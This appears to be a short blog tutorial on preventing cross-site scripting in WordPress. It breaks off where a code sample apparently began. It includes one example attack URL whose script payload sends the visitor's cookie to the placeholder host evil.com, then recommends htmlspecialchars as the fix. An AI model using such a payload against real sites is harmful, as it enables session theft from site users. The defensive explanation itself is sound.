How to remove the Cross-site Scripting in WordPress?
Recently came across a query regarding “Cross-site Scripting”. So how to solve it?
Firstly, in simple words What is “Cross-site Scripting”?
Cross-site Scripting is a type of attack that can be carried out to compromise users of a website. The exploitation of a XSS flaw enables attackers to inject client-side scripts into web pages viewed by users.
Attacker can use something like this over the site: http://example.com/search.php?query=<script>document.InnerHTML += "<img src='http://evil.com/?cookie="+document.cookie+" />";</script> to attack your site.
To solve this issue, you need to make sure all the parameters where you are receiving the data, you use htmlspecialchars to convert the above script into normal characters: